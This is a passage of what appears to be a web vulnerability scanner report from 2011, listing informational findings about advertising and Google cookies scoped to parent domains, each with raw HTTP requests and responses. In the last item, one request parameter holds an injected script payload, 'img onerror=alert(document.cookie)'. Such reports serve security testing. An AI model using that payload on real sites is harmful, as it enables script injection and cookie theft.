GET /cmadj/cm.martini/ HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Content-Length: 7047
Date: Tue, 25 Jan 2011 16:30:36 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 22-Feb-2011 16:30:36 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11de1c500e0115c; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:30:36 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...

13.108. http://khm0.google.com/kh/v/x3d76/x26 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khm0.google.com
Path:	/kh/v/x3d76/x26

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=a90843375ef24eb2:TM=1295973379:LM=1295973379:S=y00SfeV21WdWqUTv; expires=Thu, 24-Jan-2013 16:36:19 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d76/x26 HTTP/1.1
Host: khm0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a90843375ef24eb2:TM=1295973379:LM=1295973379:S=y00SfeV21WdWqUTv; expires=Thu, 24-Jan-2013 16:36:19 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 16:36:19 GMT
Server: btfe
Content-Length: 1368
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

13.109. http://khm1.google.com/kh/v/x3d76/x26 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khm1.google.com
Path:	/kh/v/x3d76/x26

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=cf9e7ea08ee15b44:TM=1295973396:LM=1295973396:S=r_nSTLT0WyjGau-L; expires=Thu, 24-Jan-2013 16:36:36 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d76/x26 HTTP/1.1
Host: khm1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=cf9e7ea08ee15b44:TM=1295973396:LM=1295973396:S=r_nSTLT0WyjGau-L; expires=Thu, 24-Jan-2013 16:36:36 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 16:36:36 GMT
Server: btfe
Content-Length: 1368
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

13.110. http://khmdb0.google.com/kh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khmdb0.google.com
Path:	/kh

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=a7f10d14c4f00411:TM=1295973412:LM=1295973412:S=4E7KVheBazHuNfU4; expires=Thu, 24-Jan-2013 16:36:52 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a7f10d14c4f00411:TM=1295973412:LM=1295973412:S=4E7KVheBazHuNfU4; expires=Thu, 24-Jan-2013 16:36:52 GMT; path=/; domain=.google.com
Date: Tue, 25 Jan 2011 16:36:52 GMT
Server: btfe
Content-Length: 1356
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

13.111. http://khmdb1.google.com/kh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khmdb1.google.com
Path:	/kh

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=bb0c184c4092797e:TM=1295973518:LM=1295973518:S=TQ6x1q9xqq1iW1xq; expires=Thu, 24-Jan-2013 16:38:38 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=bb0c184c4092797e:TM=1295973518:LM=1295973518:S=TQ6x1q9xqq1iW1xq; expires=Thu, 24-Jan-2013 16:38:38 GMT; path=/; domain=.google.com
Date: Tue, 25 Jan 2011 16:38:38 GMT
Server: btfe
Content-Length: 1356
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

13.112. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=inePNJpwIg02FVGCdbdRlhgohXUZwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
GUID=MTI5NTkwMzIwMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=6bbPNJpwIg02FAHCdbdBwhgohXAcwOoAM/oBeK7YDwAoGW8r1VQcKa4qGKGBI9YBlP53FkL3Fx6gPbw6TVE0su2B/0mxdC; GUID=MTI5NTg5MDE3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 21:06:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=inePNJpwIg02FVGCdbdRlhgohXUZwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
Set-Cookie: GUID=MTI5NTkwMzIwMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 24 Jan 2011 22:06:42 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.113. http://loadus.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://loadus.exelator.com
Path:	/load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; expires=Fri, 25-Mar-2011 21:06:41 GMT; path=/; domain=.exelator.com
BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDK0qi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNlKxrAa8pD0k%253D; myPAL=eJxLtDK2qs60MrAutjIyt1IyNDGzVLa0tDRUNjQwUTYwM1AOATJ8gSJGStaZVoYgZWYgZeamUGXmBsoGBoZAZeYGMFVGcMPgqjANqwUAip0atg%253D%253D; BFF=eJxLtDKxqi62MjSwUgoxNDDxdbC0tDRSss60MjQxN7UGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdameLSYmYJ1GIKFUcSQlFrjCRhCRI3N0C31QQiDBepxW4EWC1WI2oBnuw0eQ%253D%253D; TFF=eJyNj7ENgDAMBHdhgncIsew0GYM2RQokOugQu2MoKAKIFNa7uHvps4pui5LTjuATApKIuC5mdbpNStHO82CB6w0S9wdPJ99XvLPrK49vrc2whG%252FvLmOZ81q%252Buv3bCkYC6Ge1vU%252F%252BczVVHt9am2HJaCL3AyAZcuM%253D

Response

HTTP/1.1 200 OK
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; expires=Fri, 25-Mar-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Date: Mon, 24 Jan 2011 21:06:41 GMT
Server: HTTP server
Content-Length: 975

document.write('<img src="http://ad.yieldmanager.com/pixel?id=285379&data=245001&id=716806&data=245001&id=199372&data=245001&id=302775&data=245001&id=716807&data=245001&t=2" width="1" height="1"></img
...[SNIP]...

13.114. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.115. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=c21edb51d7356cca:TM=1295908855:LM=1295908856:S=PTt96tHXYS63KD3T; expires=Wed, 23-Jan-2013 22:40:56 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=c21edb51d7356cca:TM=1295908855:LM=1295908856:S=PTt96tHXYS63KD3T; expires=Wed, 23-Jan-2013 22:40:56 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

13.116. http://maps.google.com/maps/place previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps/place

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=052903314ef8577d:TM=1295908874:LM=1295908874:S=XSf7TWjb_N58vMlP; expires=Wed, 23-Jan-2013 22:41:14 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.117. http://media.fastclick.net/w/pg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/pg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=613465378701

Response

13.118. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT
pluto=613465378701; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAAQ2HClNACAAAb1EIASgAAQOPQAAGeAKF0AAAYsO4AkvAA0gLwJJvzBgRwEYRUAlgAABlDOAB0AA4AUXAQAA; pluto=613465378701

Response

HTTP/1.1 302 Redirect
Date: Tue, 25 Jan 2011 01:35:47 GMT
Location: http://media.fastclick.net/w/pg?cont_id=11&d=f
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT
Set-Cookie: pluto=613465378701; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT

13.119. http://media.fastclick.net/w/win.bid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/win.bid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

pjw=BAEAAAACIAMDVCk+TSAGAQABIAMCuuoDYAcC6kkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 01:37:24 GMT
vt=10070:256698:477674:54816:0:1295919444:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 01:37:24 GMT
adv_ic=BwEAAABUKT5NIAYGAAFJAAAbWSAHIAsDAAAAAA==; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 01:37:24 GMT
pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:37:24 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=2061501907&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:37:24 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 883
Set-Cookie: pjw=BAEAAAACIAMDVCk+TSAGAQABIAMCuuoDYAcC6kkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 01:37:24 GMT
Set-Cookie: vt=10070:256698:477674:54816:0:1295919444:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 01:37:24 GMT
Set-Cookie: adv_ic=BwEAAABUKT5NIAYGAAFJAAAbWSAHIAsDAAAAAA==; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 01:37:24 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:37:24 GMT

<a href="http://media.fastclick.net/w/click.here?cid=256698&mid=477674&m=1&sid=54816&c=0&tp=5&exid=3&asite=2061501907&vtid=14839&walsh=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBhN
...[SNIP]...

13.120. http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.autobytel.com
Path:	/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; Expires=Sat, 23 Jan 2016 21:06:45 GMT; Domain=.autobytel.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011?[AQB]&ndh=1&t=24/0/2011%2015%3A7%3A27%201%20360&pageName=unknown&g=http%3A//www.autobytel.com/x22&r=http%3A//burp/show/31&cc=USD&server=CWEB425&events=event10&products=%3B%3B%3B%3Bevent10%3D0&c1=Search%20Engine%20Optimization%20Project&v1=Search%20Engine%20Optimization%20Project&c2=SEO%20DTS%20-%20Google%20ABTL%2013148&v2=SEO%20DTS%20-%20Google%20ABTL%2013148&v3=NT-&v6=Search%20Engine%20Optimization%20Project%20%3A%20unknown&c10=%7C&c11=Search%20Engine%20Optimization%20Project%7C13148%7CABTL&c12=%7C%7C&c14=unknown%20%3A%20Search%20Engine%20Optimization%20Project%20entry%20page&c15=%7CNo%20Article&c20=%7C%7C%7C%7C%7C%7CSearch%20Engine%20Optimization%20Project&c21=Autobytel.com&c32=ads%20-%200&c34=Google%20Search%7Ef34b4--%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document.cookie%29%3Ef067754e5c4&c40=427D360F-AD19-8945-2CEDA65620083A33&c42=UpperFunnel&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.autobytel.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
